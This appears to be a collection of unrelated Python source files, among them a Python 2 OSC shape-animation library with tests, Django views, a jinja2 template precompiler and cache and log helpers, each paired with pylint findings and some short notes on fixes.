104 root = Tk()
105 root.geometry("{}x{}".format(root.winfo_screenwidth(), root.winfo_screenheight()))
106 app = PlagiarismDetect(root)
107 root.mainloop()
108
109 if __name__ == '__main__':
110 main() | 2 - warning: wildcard-import
10 - refactor: too-many-instance-attributes
106 - warning: unused-variable
2 - warning: unused-wildcard-import
|
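
The uniqueness percentages shown by analyze() boil down to one ratio: characters covered by the merged plagiarism intervals over total characters. A small self-contained sketch of that computation; uniqueness is a hypothetical helper matching the [start, end) interval format get_merged_points returns.

def uniqueness(text, intervals):
    covered = sum(end - start for start, end in intervals if end > start)
    return 1.0 - covered / len(text)

# 10 characters, 3 of them covered -> 70% unique
assert abs(uniqueness("abcdefghij", [(2, 5)]) - 0.7) < 1e-9
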
1 import threading
2 from sonilab import event
3 import shape
4
5 """
6 Shapes manages an array of shape objects.
7 """
8
9 LOCK = threading.Lock()
10 data = {}
11 count = 0
12
13 def add(name, obj):
14 global LOCK , count
15 with LOCK:
16 data[name]=(count , obj)
17 count += 1
18
19
20
21 def get_primitive(name):
22 tuple_uid_and_obj = data[name]
23 uid = tuple_uid_and_obj[0]
24 obj = tuple_uid_and_obj[1]
25
26 tuple_address_and_params = obj.get_primitive()
27 adr = tuple_address_and_params[0]
28 params = tuple_address_and_params[1]
29 params.insert(0, uid)
30 return (adr,params)
31
32
33
34 def get_all():
35 container = []
36 for elm in data:
37 tmp = data[elm]
38 container.append( get_primitive(tmp[1].name) )
39 return container
40
41
42
43 def get(name):
44 tuple_uid_and_obj = data[name]
45 return tuple_uid_and_obj[1]
46
47
48
49 def set(name, variable, *args):
50 if args:
51 tuple_uid_and_obj = data[name]
52 obj = tuple_uid_and_obj[1]
53 obj.set(variable, *args)
54
55
56
57 def print_all():
58 print "--- [shapes : print_all() ] ---"
59 for elm in data:
60 tmp = data[elm]
61 obj = tmp[1]
62 tmp = obj.get_primitive()
63 params = tmp[1]
64 print elm , obj
65 for param in params:
66 print param ,
67
68 print "\n--"
69
70 print "--- [print_all() : end] ---"
71
72
73
| 58 - error: syntax-error
|
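
pylint's syntax-error at line 58 is Python 2 print syntax: Python 3 cannot even parse this module, which also masks any further findings. A sketch of print_all() ported to Python 3 (it reads the module-level data dict defined above):

def print_all():
    print("--- [shapes : print_all() ] ---")
    for name, (_uid, obj) in data.items():
        _adr, params = obj.get_primitive()
        print(name, obj)
        print(" ".join(str(p) for p in params))
        print("--")
    print("--- [print_all() : end] ---")
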
1 # if you want to use this library from outside of the sonilab folder, you should import as follows:
2 # from sonilab import sl_metro, sl_osc_send, osc_receive, event
3 # enjoy !!
4
5 import random
6 from sonilab import sl_metro, sl_osc_send, osc_receive, event
7 import shapes, shape, send_all
8
9 metro = sl_metro.Metro(0.016)
10 metro2 = sl_metro.Metro(0.5)
11 sender = sl_osc_send.slOscSend("127.0.0.1" , 57137)
12 receiver = osc_receive.OscReceive(57138)
13
14 ball_posi_a = 0.1
15 ball_posi_b = 0.9
16 ball_speed = 0.5
17
18
19 def osc_received (vals):
20 print "OSC RECEIVED :: arg[0] = " + str(vals[0]) + " | arg[1] = " + str(vals[1])
21
22
23
24 def send(adr, vals):
25 sender.send(adr, vals)
26
27 event.add("/test" , osc_received)
28 event.add("/send" , send)
29 receiver.setup("/foo")
30
31
32
33 def init():
34 global ball_posi_a, ball_posi_b
35 #Make Primitives
36 node1 = shape.Shape("/circle" , "node1") #set shape_type tag and unique name
37 node1.set("x1" , ball_posi_a)
38 node1.set("y1" , 0.5)
39 node1.set("size" , 0.005)
40 node1.set("fill" , 0)
41 shapes.add(node1.name , node1)
42
43 node2 = shape.Shape("/circle" , "node2") #set shape_type tag and unique name
44 node2.set("x1" , ball_posi_b)
45 node2.set("y1" , 0.5)
46 node2.set("size" , 0.005)
47 node2.set("fill" , 0)
48 shapes.add(node2.name , node2)
49
50 ball = shape.Shape("/circle" , "ball") #set shape_type tag and unique name
51 ball.set("x1" , ball_posi_a)
52 ball.set("y1" , 0.5)
53 ball.set("size" , 0.005)
54 ball.set("fill" , 1)
55 shapes.add(ball.name , ball)
56
57 arc = shape.Shape("/arc" , "arc") #set shape_type tag and unique name
58 arc.set("x1" , ball_posi_a)
59 arc.set("y1" , 0.5)
60 arc.set("x2" , ball_posi_b)
61 arc.set("y2" , 0.5)
62 arc.set("height", 0.3)
63 shapes.add(arc.name , arc)
64
65 wave = shape.Shape("/wave", "wave")
66 wave.set("x1" , ball_posi_a)
67 wave.set("y1" , 0.5)
68 wave.set("x2" , ball_posi_b)
69 wave.set("y2" , 0.5)
70 wave.set("height", 0.3)
71 wave.set("freq" , 4.0)
72 wave.set("phase", 0.0)
73 shapes.add(wave.name , wave)
74
75
76
77 def get_primitive(name):
78 tmp = shapes.get_primitive(name)
79 return tmp[1] #<- shapes.get_primitive returns a tuple. It includes the shape_tag (same as osc_address) and the list of parameters.
80
81
82 def move_ball():
83 print "move_ball"
84 global ball_posi_a, ball_posi_b, ball_speed
85 ball = shapes.get("ball")
86 arc = shapes.get("arc")
87 wave = shapes.get("wave")
88 ball_x = ball.get('x1')
89 print ball_x
90 if ball_x == ball_posi_a:
91 print "A"
92 ball.set("x1" , ball_posi_b, ball_speed)
93 arc.set("height", 0.3, ball_speed)
94 wave.set("freq", 7.0, ball_speed)
95 elif ball_x == ball_posi_b:
96 print "B"
97 ball.set("x1" , ball_posi_a, ball_speed)
98 arc.set("height", -0.3, ball_speed)
99 wave.set("freq", 2.0, ball_speed)
100
101
102 def draw():
103 dic = shapes.get_all()
104 send_all.run(dic)
105
106
107
108 try :
109 #INIT all objects
110 init()
111 prim = None
112
113 #Start Loop
114 while True:
115 if metro.update():
116 draw()
117 if metro2.update(): #write code to execute every 1 sec
118 prim = get_primitive("ball")
119 print "x1 = " , prim[1] , " : y1 = " , prim[2]
120 if random.randint(0,1) == 1:
121 move_ball() #move ball with 50 percent rate in each round
122
123
124 except KeyboardInterrupt :
125 receiver.terminate()
| 20 - error: syntax-error
|
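
One fragile spot in move_ball() above: it compares interpolated float positions with == against the endpoints, so the ball only turns around if the interpolation lands exactly on ball_posi_a or ball_posi_b. A tolerance-based check is more robust; at_position is a hypothetical helper.

import math

def at_position(ball_x, target, tol=1e-6):
    return math.isclose(ball_x, target, abs_tol=tol)

# inside move_ball():
#     if at_position(ball_x, ball_posi_a): ...
#     elif at_position(ball_x, ball_posi_b): ...
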
1 from sonilab import timed_interpolation
2 class Shape:
3 """ Shape Class """
4
5 def __init__(self, type, name):
6
7 """
8 To instantiate, you should set two arguments.
9 The first is type. Type means the shape type. It is also used as the address for the OSC message.
10 The types are /circle, /triangle, /square, /rect, /line, /arc, /wave etc.
11
12 The second is name. It is a unique name for each shape object.
13 However, the uniqueness of the name must be ensured by the user.
14 """
15
16 self.uid = 0
17 self.type = type
18 self.name = name
19 self.active = 0
20 self._x1 = timed_interpolation.TimedInterpolation()
21 self._x1.set(0.5, 0.0)
22 self._y1 = timed_interpolation.TimedInterpolation()
23 self._y1.set(0.5, 0.0)
24 self._x2 = timed_interpolation.TimedInterpolation()
25 self._x2.set(0.5, 0.0)
26 self._y2 = timed_interpolation.TimedInterpolation()
27 self._y2.set(0.5, 0.0)
28
29 self._size = timed_interpolation.TimedInterpolation()
30 self._size.set(0.137, 0.0)
31 self._height = timed_interpolation.TimedInterpolation()
32 self._height.set(0.137, 0.0)
33 self._angle = timed_interpolation.TimedInterpolation()
34 self._angle.set(0.137, 0.0)
35 self._freq = timed_interpolation.TimedInterpolation()
36 self._freq.set(0.137, 0.0)
37 self._amp = timed_interpolation.TimedInterpolation()
38 self._amp.set(0.137, 0.0)
39 self._phase = timed_interpolation.TimedInterpolation()
40 self._phase.set(0.137, 0.0)
41 self._thick = timed_interpolation.TimedInterpolation()
42 self._thick.set(0.137, 0.0)
43 self.fill = 1
44
45
46 def get_primitive(self):
47 if self.type == "/circle" :
48 params = [self._x1.update(), self._y1.update(), self._size.update(), self.fill]
49 elif self.type == "/triangle" :
50 params = [self._x1.update(), self._y1.update(), self._size.update(), self._angle.update(), self.fill]
51 elif self.type == "/square" :
52 params = [self._x1.update(), self._y1.update(), self._size.update(), self._angle.update(), self.fill]
53 elif self.type == "/rect" :
54 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._angle.update(), self.fill]
55 elif self.type == "/line" :
56 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._thick.update()]
57 elif self.type == "/arc" :
58 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._height.update()]
59 elif self.type == "/wave" :
60 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._freq.update(), self._amp.update(), self._phase.update(), self._thick.update()]
61 else:
62 print "---- Shape.send() :: Unknown type was set !!"
63
64 return (self.type, params)
65
66
67
68 def get(self, variable):
69 tmp = None
70 #the variable is a plain attribute: return its value directly.
71 if variable == "uid" or variable == "active" or variable == "fill" or variable == "name" or variable == "type" :
72 src = "tmp = self." + variable
73 exec(src)
74 return tmp
75 else:
76 src = "tmp = self._" + variable + ".update()"
77 exec(src)
78 return tmp
79
80
81
82
83 def set(self, variable, *args):
84
85 if args:
86 val = args[0]
87 size = len(args)
88
89 if variable == "uid" or variable == "active" or variable == "fill" :
90 src = "self." + variable + "=" + str(val)
91 exec(src)
92 return
93 elif variable == "name" or variable == "type" :
94 # when the variable is a string, wrap the value in quotes for exec
95 src = "self." + variable + "=" + "\"" + str(val) + "\""
96 exec(src)
97 return
98
99
100 if size == 2:
101 # if the second argument was set, set it as duration
102 duration = args[1]
103 else:
104 duration = 0.0
105
106 # set interpolation
107 src = "self._" + variable + ".set(" + str(val) + " , " + str(duration) + ")"
108 exec(src)
109
110
111
112
113
114
115
116
117
118
119
| 62 - error: syntax-error
|
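
The exec()-built attribute access in get()/set() above is fragile (quoting bugs, code injection, opaque to analysis), and pylint never even reaches it here because it stops at the print syntax-error. getattr/setattr cover every case the string-built code handles. A sketch of the two method bodies; _PLAIN is a helper name introduced here, not part of the original class.

_PLAIN = {"uid", "active", "fill", "name", "type"}

def get(self, variable):
    if variable in _PLAIN:
        return getattr(self, variable)
    return getattr(self, "_" + variable).update()

def set(self, variable, *args):
    if not args:
        return
    val = args[0]
    if variable in _PLAIN:
        setattr(self, variable, val)
        return
    duration = args[1] if len(args) >= 2 else 0.0
    getattr(self, "_" + variable).set(val, duration)
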
1 from sonilab import event
2 import send_all
3
4
5 def send (adr, params):
6 print adr , " : " ,
7 for elm in params :
8 print elm ,
9 print " /// "
10
11 event.add("/send" , send)
12
13
14 array = []
15 array.append( ("/test1",[1,'a']) )
16 array.append( ("/test2",[2,'b']) )
17 array.append( ("/test3",[3,'c']) )
18 send_all.run(array)
19
20
21
22
23
| 6 - error: syntax-error
|
1 import time
2 import shapes, shape
3
4 circle1 = shape.Shape("/circle" , "circle1")
5 rect1 = shape.Shape("/rect" , "rect1")
6
7 shapes.add(circle1.name, circle1)
8 shapes.add(rect1.name, rect1)
9 shapes.print_all()
10
11 #Check set UID
12 tupple_adr_and_params1 = shapes.get_primitive(circle1.name)
13 tupple_adr_and_params2 = shapes.get_primitive(rect1.name)
14 assert tupple_adr_and_params1[1][0] == 0
15 assert tupple_adr_and_params2[1][0] == 1
16
17
18 #check get_all
19 all_obj = shapes.get_all()
20 for elm in all_obj:
21 obj = elm[1]
22 print elm[0], ":" , obj[0], "," , obj[1], "," , obj[2], "," , obj[3]
23
24
25
26 #How to write and read each shape
27 shapes.set("circle1" , "x1", 777.0) #You can set each parameter with the set method
28 circle1 = shapes.get("circle1") #You can fetch each shape object with the get method
29 assert circle1.get("x1") == 777.0
30
31
32 #You can set param with time transition
33 shapes.set("circle1" , "x1", 700.0 , 2.0) #the fourth argument is the transition duration in seconds
34 circle1._x1.print_params()
35
36 while circle1.get("x1") != 700.0:
37 print circle1.get("x1") #print the transition
38 time.sleep(0.1)
39
40
41 #You can see all objects and the parameters with print_all()
42 shapes.print_all()
43
44 print "OK"
| 22 - error: syntax-error
|
1 import shape
2 from sonilab import sl_metro
3
4 metro = sl_metro.Metro(1.0)
5
6
7 shape.Shape.__doc__
8 obj = shape.Shape("/circle" , "foo")
9
10 # obj.type = "SQUARE"
11 obj.active = True
12 obj.set("x1" , 0.1)
13 obj.set("y1" , 0.2)
14 obj.set("y1" , 0.2)
15 obj.set("x2" , 0.3)
16 obj.set("y2" , 4.0)
17
18 obj.set("size" , 0.131)
19 obj.set("height" , 0.132)
20 obj.set("angle" , 0.133)
21 obj.set("freq" , 0.134)
22 obj.set("amp" , 0.135)
23 obj.set("phase" , 0.136)
24 obj.set("thick" , 0.139)
25 obj.fill = False
26
27
28 #check all parameters with get method
29 assert obj.get("type") == "/circle"
30 assert obj.get("name") == "foo"
31 assert obj.get("active") == 1
32 assert obj.get("x1") == 0.1
33 assert obj.get("y1") == 0.2
34 assert obj.get("x2") == 0.3
35 assert obj.get("y2") == 4.0
36
37 assert obj.get("size") == 0.131
38 assert obj.get("height") == 0.132
39 assert obj.get("angle") == 0.133
40 assert obj.get("freq") == 0.134
41 assert obj.get("amp") == 0.135
42 assert obj.get("phase") == 0.136
43 assert obj.get("thick") == 0.139
44 assert obj.get("fill") == 0
45
46
47 #Test parameter managements
48 obj.set("type" , "/circle") #Test set parameter with set method
49 rt = obj.get_primitive()
50 assert rt[0] == "/circle"
51 params = rt[1]
52 assert params[0] == 0.1
53 assert params[1] == 0.2
54 assert params[2] == 0.131
55 assert params[3] == 0
56
57 #Triangle Test
58 obj.set("type" , "/triangle")
59 rt = obj.get_primitive()
60 assert rt[0] == "/triangle"
61 params = rt[1]
62 assert params[0] == 0.1
63 assert params[1] == 0.2
64 assert params[2] == 0.131
65 assert params[3] == 0.133
66 assert params[4] == 0
67
68 #Square Test
69 obj.set("type" , "/square")
70 rt = obj.get_primitive()
71 assert rt[0] == "/square"
72 params = rt[1]
73 assert params[0] == 0.1
74 assert params[1] == 0.2
75 assert params[2] == 0.131
76 assert params[3] == 0.133
77 assert params[4] == 0
78
79 #Rect Test
80 obj.set("type" , "/rect")
81 rt = obj.get_primitive()
82 assert rt[0] == "/rect"
83 params = rt[1]
84 assert params[0] == 0.1
85 assert params[1] == 0.2
86 assert params[2] == 0.3
87 assert params[3] == 4.0
88 assert params[4] == 0.133
89 assert params[5] == 0
90
91 #Line Test
92 obj.set("type" , "/line")
93 rt = obj.get_primitive()
94 assert rt[0] == "/line"
95 params = rt[1]
96 assert params[0] == 0.1
97 assert params[1] == 0.2
98 assert params[2] == 0.3
99 assert params[3] == 4.0
100 assert params[4] == 0.139
101
102 #ARC Test
103 obj.set("type" , "/arc")
104 rt = obj.get_primitive()
105 assert rt[0] == "/arc"
106 params = rt[1]
107 assert params[0] == 0.1
108 assert params[1] == 0.2
109 assert params[2] == 0.3
110 assert params[3] == 4.0
111 assert params[4] == 0.132
112
113 #WAVE Test
114 obj.set("type" , "/wave")
115 rt = obj.get_primitive()
116 assert rt[0] == "/wave"
117 params = rt[1]
118 assert params[0] == 0.1
119 assert params[1] == 0.2
120 assert params[2] == 0.3
121 assert params[3] == 4.0
122 assert params[4] == 0.134
123 assert params[5] == 0.135
124 assert params[6] == 0.136
125 assert params[7] == 0.139
126
127
128 #TEST .set method with int
129 obj.set("uid" , 137)
130 assert obj.uid == 137
131 obj.set("active" , 138)
132 assert obj.active == 138
133 obj.set("fill" , 139)
134 assert obj.fill == 139
135
136 # TEST .set method with string
137 obj.set("type" , "str_test_for_type")
138 assert obj.type == "str_test_for_type"
139 obj.set("name" , "str_test_for_name")
140 assert obj.name == "str_test_for_name"
141
142 #restore the shape type
143 obj.set("type" , "/wave")
144 obj.set("x1" , 0.0)
145 print "Basically, you should use setter and getter methods."
146 print "ex obj.set(\"X1\", 2.0)\n"
147
148 #interpolation demo
149 print "If you set variables with second as second argment then the parameter thanged with interpolation."
150 print "ex. obj.set(\"x1\" , 10.0, 10.0) # <- means make x1 value change to 10.0 with 10.0 seconds"
151 obj.set("x1" , 10.0, 10.0)
152 while True:
153 if metro.update():
154 tmp = obj.get_primitive()
155 params = tmp[1]
156 print params[0]
157 if params[0]==10.0:
158 break
159
160 print "OK"
| 145 - error: syntax-error
|
1 from sonilab import event
2
3 def run(array):
4 for elm in array:
5 adr = elm[0]
6 params = elm[1]
7 event.bang("/send" , adr, params)
8
9
10
| Clean Code: No Issues Detected
|
1 from django.urls import reverse
2 from django.shortcuts import render, redirect
3 from django.forms import modelformset_factory
4 from django.views.generic import *
5 from .models import *
6
7
8 class IndexView(ListView):
9 model = Song
10 template_name = 'song/song_list.html'
11
12 def get_context_data(self, **kwargs):
13 context = super(IndexView, self).get_context_data(**kwargs)
14 context['navbar_title'] = 'AAC로 노래해요'
15 context['navbar_subtitle'] = 'AAC로 노래해요'
16 return context
17
18
19 class DetailView(DetailView):
20 model = Song
21 template_name = 'song/song_detail.html'
22
23 def get_context_data(self, **kwargs):
24 image = Image.objects.select_related('song')
25 context = super(DetailView, self).get_context_data(**kwargs)
26 context['navbar_title'] = 'AAC로 노래해요'
27 context['navbar_subtitle'] = 'AAC로 노래해요'
28 context['images'] = image
29 return context
| 4 - warning: wildcard-import
5 - error: relative-beyond-top-level
5 - warning: wildcard-import
8 - error: undefined-variable
9 - error: undefined-variable
13 - refactor: super-with-arguments
8 - refactor: too-few-public-methods
19 - error: undefined-variable
20 - error: undefined-variable
24 - error: undefined-variable
25 - refactor: super-with-arguments
19 - refactor: too-few-public-methods
1 - warning: unused-import
2 - warning: unused-import
2 - warning: unused-import
3 - warning: unused-import
|
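
Beyond the wildcard-import warnings, class DetailView(DetailView) shadows Django's generic view: it happens to work because the wildcard import binds the name first, but it is a trap for readers and pylint alike. A sketch with explicit imports and a distinct class name, assuming the app's models module defines Song and Image as the original wildcard import suggests:

from django.views.generic import DetailView
from .models import Song, Image

class SongDetailView(DetailView):
    model = Song
    template_name = 'song/song_detail.html'

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['navbar_title'] = 'AAC로 노래해요'
        context['images'] = Image.objects.select_related('song')
        return context
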
1 # -*- coding: utf-8 -*-
2
3 import jinja2
4 import pytest
5
6 import jinja2precompiler
7
8 def test_IndexError():
9 env = jinja2.Environment(loader=jinja2.FileSystemLoader(["."]))
10 filter_func = jinja2precompiler.make_filter_func("", env, extensions=["html"], all_files=True)
11 assert filter_func("test.html") == True
12 assert filter_func("test.xml") == False
13 assert filter_func("html") == False
| 9 - warning: bad-indentation
10 - warning: bad-indentation
11 - warning: bad-indentation
12 - warning: bad-indentation
13 - warning: bad-indentation
4 - warning: unused-import
|
1 #!/usr/bin/env python
2 # -*- coding: utf-8 -*-
3
4 from optparse import OptionParser
5 import logging
6 import os
7 import re
8 import sys
9
10 import jinja2
11
12 def option_parse():
13 parser = OptionParser()
14 parser.add_option("-a", "--all", action="store_true", dest="all_files", help="all files")
15 parser.add_option("-b", "--base", dest="base", default="", help="base dir name", metavar="DIR")
16 parser.add_option("-c", "--pyc", action="store_true", dest="pyc", help="byte compile")
17 parser.add_option("-d", "--debug", action="store_true", dest="debug", help="debug")
18 parser.add_option("-e", "--ext", dest="extensions", default="html,xhtml", help="list of extension [default: %default]", metavar="EXT[,...]")
19 parser.add_option("-m", "--modulename", action="store_true", dest="modulename", help="return compiled module file name")
20 parser.add_option("-q", "--quit", action="store_true", dest="quit", help="no message")
21 parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="more messages")
22 (options, args) = parser.parse_args()
23 return parser, options, args
24
25 def get_module_filename(filename, py_compile=False):
26 module_filename = jinja2.ModuleLoader.get_module_filename(filename)
27 if py_compile:
28 module_filename += "c"
29 return module_filename
30
31 def make_filter_func(target, env, extensions=None, all_files=False):
32
33 def filter_func(tpl):
34 if extensions is not None and os.path.splitext(tpl)[1][1:] not in extensions:
35 return False
36 if all_files:
37 return True
38 _content, filename, _update = env.loader.get_source(env, tpl)
39 module_filename = os.path.join(target, get_module_filename(tpl))
40 if not os.path.isfile(module_filename):
41 module_filename_pyc = module_filename + "c"
42 if not os.path.isfile(module_filename_pyc):
43 return True
44 else:
45 module_filename = module_filename_pyc
46 if os.path.getmtime(filename) > os.path.getmtime(module_filename):
47 return True
48 return False
49
50 return filter_func
51
52 if jinja2.__version__[:3] >= "2.8":
53 """
54 jinja2 2.8 supports walking symlink directories.
55 see: https://github.com/mitsuhiko/jinja2/issues/71
56 """
57
58 from jinja2 import FileSystemLoader
59
60 else:
61
62 class FileSystemLoader(jinja2.FileSystemLoader):
63
64 def __init__(self, searchpath, encoding='utf-8', followlinks=False):
65 super(FileSystemLoader, self).__init__(searchpath, encoding)
66 self.followlinks = followlinks
67
68 def list_templates(self):
69 found = set()
70 for searchpath in self.searchpath:
71 walk_dir = os.walk(searchpath, followlinks=self.followlinks)
72 for dirpath, dirnames, filenames in walk_dir:
73 for filename in filenames:
74 template = os.path.join(dirpath, filename) \
75 [len(searchpath):].strip(os.path.sep) \
76 .replace(os.path.sep, '/')
77 if template[:2] == './':
78 template = template[2:]
79 if template not in found:
80 found.add(template)
81 return sorted(found)
82
83 def main():
84
85 def logger(msg):
86 sys.stderr.write("%s\n" % msg)
87
88 parser, options, args = option_parse()
89 if options.debug:
90 logging.getLogger().setLevel(logging.DEBUG)
91 elif options.verbose:
92 logging.getLogger().setLevel(logging.INFO)
93 elif options.quit:
94 logging.getLogger().setLevel(logging.CRITICAL)
95 logger = None
96 logging.debug("parse_options: options %s" % options)
97 logging.debug("parse_options: args %s" % args)
98 for i in args:
99 if not os.path.exists(i):
100 logging.warning("No such directory: '%s'" % i)
101 sys.exit(1)
102 if options.modulename:
103 basedir = re.compile(options.base)
104 results = list()
105 for i in args:
106 results.append(os.path.join(options.base, get_module_filename(basedir.sub("", i).lstrip("/"), py_compile=options.pyc)))
107 print(" ".join(results))
108 sys.exit(0)
109 if len(args) != 1:
110 parser.print_help()
111 sys.exit(1)
112 logging.info("Compiling bundled templates...")
113 arg = args[0]
114 if not arg.endswith(os.path.sep):
115 arg = "".join((arg, os.path.sep))
116 env = jinja2.Environment(loader=FileSystemLoader([os.path.dirname(arg)], followlinks=True))
117 if os.path.isdir(arg):
118 if options.extensions is not None:
119 extensions = options.extensions.split(",")
120 else:
121 extensions = None
122 filter_func = make_filter_func(arg, env, extensions, options.all_files)
123 target = arg
124 logging.info("Now compiling templates in %s." % arg)
125 else:
126 basename = os.path.basename(arg)
127 filter_func = lambda x: x == basename
128 target = os.path.dirname(arg)
129 logging.info("Now compiling a template: %s." % arg)
130 env.compile_templates(target, extensions=None,
131 filter_func=filter_func, zip=None, log_function=logger,
132 ignore_errors=False, py_compile=options.pyc)
133 logging.info("Finished compiling bundled templates...")
134
135 if __name__== "__main__":
136 logging.getLogger().setLevel(logging.WARNING)
137 main()
| 13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
50 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
88 - warning: bad-indentation
89 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
97 - warning: bad-indentation
98 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
102 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
110 - warning: bad-indentation
111 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
115 - warning: bad-indentation
116 - warning: bad-indentation
117 - warning: bad-indentation
118 - warning: bad-indentation
119 - warning: bad-indentation
120 - warning: bad-indentation
121 - warning: bad-indentation
122 - warning: bad-indentation
123 - warning: bad-indentation
124 - warning: bad-indentation
125 - warning: bad-indentation
126 - warning: bad-indentation
127 - warning: bad-indentation
128 - warning: bad-indentation
129 - warning: bad-indentation
130 - warning: bad-indentation
133 - warning: bad-indentation
136 - warning: bad-indentation
137 - warning: bad-indentation
4 - warning: deprecated-module
42 - refactor: no-else-return
53 - warning: pointless-string-statement
65 - refactor: super-with-arguments
72 - warning: unused-variable
96 - warning: logging-not-lazy
97 - warning: logging-not-lazy
100 - warning: logging-not-lazy
104 - refactor: use-list-literal
124 - warning: logging-not-lazy
129 - warning: logging-not-lazy
130 - error: unexpected-keyword-arg
83 - refactor: too-many-branches
|
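
pylint flags optparse as deprecated; argparse has been its replacement since Python 2.7. A partial port of option_parse() covering a subset of the flags (the remaining add_option calls translate the same way):

import argparse

def option_parse():
    parser = argparse.ArgumentParser()
    parser.add_argument("-a", "--all", action="store_true", dest="all_files", help="all files")
    parser.add_argument("-b", "--base", dest="base", default="", help="base dir name", metavar="DIR")
    parser.add_argument("-c", "--pyc", action="store_true", dest="pyc", help="byte compile")
    parser.add_argument("-e", "--ext", dest="extensions", default="html,xhtml",
                        help="list of extensions (default: %(default)s)", metavar="EXT[,...]")
    parser.add_argument("args", nargs="*")      # positional arguments
    options = parser.parse_args()
    return parser, options, options.args
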
1 """Cache Tool for Answerable
2
3 This file contains the functions to access and modify cached content.
4 It may be used by different modules, so each function requires a category argument
5 to avoid collisions.
6
7 As every function is intended to serve a secondary role inside external callers, the
8 logs have an extra level of indentation.
9 """
10
11 import json
12 import pathlib
13 from datetime import datetime as dt
14 from datetime import timedelta as td
15
16 from tools.log import log
17 from tools.displayer import fg, green, magenta
18
19
20 __cache_dir = ".cache"
21
22
23 def check(category: str, _file: str, max_delta: td) -> (bool, pathlib.Path):
24 """Return if a file is cached and where it is located.
25
26 Returns:
27 (B, P) where
28 - B is true if the content is cached and usable
29 - P is the path where the cached content is/should be.
30
31 Parameters:
32 category: Folder inside the cache.
33 _file: File name to look for.
34 max_delta: Timedelta used as threshold to consider a file too old.
35 """
36
37 # Prepare the path to the cached file
38 subpath = pathlib.Path(category) / _file
39 path = pathlib.Path.cwd() / __cache_dir / subpath
40 path.parent.mkdir(parents=True, exist_ok=True)
41
42 try:
43 if not path.exists():
44 log(" Miss {}", fg(subpath, magenta))
45 return False, path
46 else:
47 # Check if the file is too old
48 log(" Hit {}", fg(subpath, green))
49 modified = dt.fromtimestamp(path.stat().st_mtime)
50 now = dt.now()
51 delta = now - modified
52 log(" Time passed since last fetch: {}", delta)
53 valid = delta < max_delta
54 if valid:
55 log(fg(" Recent enough", green))
56 else:
57 log(fg(" Too old", magenta))
58 return valid, path
59 except OSError as err:
60 log(" {}: {}", err, fg(subpath, magenta))
61 return False, path
62
63
64 def update(category: str, _file: str, obj, json_format=True):
65 """Update or create a file in the cache
66
67 Parameters:
68 category: Folder inside the cache.
69 _file: File name to store in.
70 obj: Serializable object to store.
71 """
72
73 subpath = pathlib.Path(category) / _file
74 path = pathlib.Path.cwd() / __cache_dir / subpath
75 path.parent.mkdir(parents=True, exist_ok=True)
76 try:
77 with open(path, "w") as fh:
78 if json_format:
79 json.dump(obj, fh, indent=2)
80 else:
81 fh.write(obj)
82 log(" Cache updated: {}", fg(subpath, green))
83 except OSError as err:
84 log(" {}: {}", err, fg(subpath, magenta))
85 return False, path
86
| 43 - refactor: no-else-return
77 - warning: unspecified-encoding
64 - refactor: inconsistent-return-statements
|
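
Two of the pylint hits above compose into one fix: open the file with an explicit encoding, and return the same (bool, path) pair on success that the except branch already returns on failure. A drop-in sketch of update() for this module (it relies on the pathlib, json, log, fg, green and magenta names already imported above):

def update(category, _file, obj, json_format=True):
    subpath = pathlib.Path(category) / _file
    path = pathlib.Path.cwd() / __cache_dir / subpath
    path.parent.mkdir(parents=True, exist_ok=True)
    try:
        with open(path, "w", encoding="utf-8") as fh:
            if json_format:
                json.dump(obj, fh, indent=2)
            else:
                fh.write(obj)
        log("  Cache updated: {}", fg(subpath, green))
        return True, path
    except OSError as err:
        log("  {}: {}", err, fg(subpath, magenta))
        return False, path
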
1 """Log Tool for Answerable
2
3 This file contains the functions used to log control data and debug messages
4 in a unified format.
5 """
6
7 import re
8 import sys
9 import inspect
10
11 from tools.displayer import bold, red, magenta, fg
12
13 _logs = [] # list of file handlers
14 _ansire = re.compile("\\033\[[^m]+m") # ansi escape sequences
15
16
17 def _strip_ansi(msg):
18 """Strip ansi escape sequences"""
19
20 return re.sub(_ansire, "", msg)
21
22
23 def _get_caller():
24 frm = inspect.stack()[2]
25 return inspect.getmodule(frm[0]).__name__
26
27
28 def add_stderr():
29 """Add the stderr to the log file handlers"""
30
31 _logs.append(sys.stderr)
32
33
34 def add_log(logfile):
35 """Open a new file and add it to the log file handlers"""
36
37 _logs.append(open(logfile, "w"))
38
39
40 def close_logs():
41 """Close all log file handlers."""
42
43 for f in _logs:
44 if f is not sys.stderr:
45 f.close()
46
47
48 def advice_message():
49 """Returns the advice of where to find the full logs"""
50 lognames = ", ".join([fh.name for fh in _logs if fh is not sys.stderr])
51 return "Full log in " + lognames
52
53
54 def abort(msg, *argv):
55 """Print an error message and aborts execution"""
56
57 if sys.stderr not in _logs:
58 add_stderr()
